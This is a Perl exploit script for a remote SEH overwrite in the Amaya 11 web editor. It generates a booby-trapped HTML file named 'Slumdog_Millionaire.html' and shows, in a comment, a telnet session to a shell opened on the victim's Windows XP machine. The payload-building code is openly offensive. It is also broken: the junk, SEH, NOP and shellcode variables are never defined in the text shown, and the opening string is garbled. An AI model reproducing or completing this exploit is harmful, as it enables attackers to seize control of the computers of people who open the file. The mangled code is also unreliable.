#!/usr/bin/perl # # Title: Amaya Web Editor 11 Remote SEH Overwrite Exploit # # Summary: Amaya is a Web editor, i.e. a tool used to create and update documents directly on the Web. # # Product web page: http://www.w3.org/Amaya/ # # Tested on Microsoft Windows XP Professional SP2 (English) # # Reference: http://www.milw0rm.com/exploits/7906 # # Exploit coded by Gjoko 'LiquidWorm' Krstic # # liquidworm [t00t] gmail [w00t] com # # 30.01.2009 # #------------------------------------------------------------------ # # lqwrm@zeroscience:~$ telnet 192.168.1.101 6161 # Trying 192.168.1.101... # Connected to 192.168.1.101. # Escape character is '^]'. # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\Program Files\Amaya\WindowsWX\bin>dir # Volume in drive C is System # Volume Serial Number is D484-8540 # # Directory of C:\Program Files\Amaya\WindowsWX\bin # # 29.01.2009 19:27 . # 29.01.2009 19:27 .. # 16.12.2008 14:44 5.816.320 amaya.exe # 16.12.2008 14:41 1.290.240 thotprinter.dll # 19.08.2008 11:02 135.168 wxbase28u_net_vc_custom.dll # 19.08.2008 11:01 1.220.608 wxbase28u_vc_custom.dll # 19.08.2008 11:02 135.168 wxbase28u_xml_vc_custom.dll # 19.08.2008 11:03 741.376 wxmsw28u_adv_vc_custom.dll # 19.08.2008 11:03 286.720 wxmsw28u_aui_vc_custom.dll # 19.08.2008 11:01 3.018.752 wxmsw28u_core_vc_custom.dll # 19.08.2008 11:02 49.152 wxmsw28u_gl_vc_custom.dll # 19.08.2008 11:02 524.288 wxmsw28u_html_vc_custom.dll # 19.08.2008 11:03 593.920 wxmsw28u_xrc_vc_custom.dll # 11 File(s) 13.811.712 bytes # 2 Dir(s) 7.520.141.312 bytes free # # C:\Program Files\Amaya\WindowsWX\bin> # #------------------------------------------------------------------ my $start = "" . "\n" . '" . "\n" . ""; my $file= "Slumdog_Millionaire.html"; $payload = "$start" . "$junk" . "$next_seh" . "$seh" . "$nop" . "$sc " . "$end"; open (exploit, ">./$file") or die "Can't open $file: $!"; print exploit "$payload"; close (exploit); print "\t\n - $file successfully created!\n";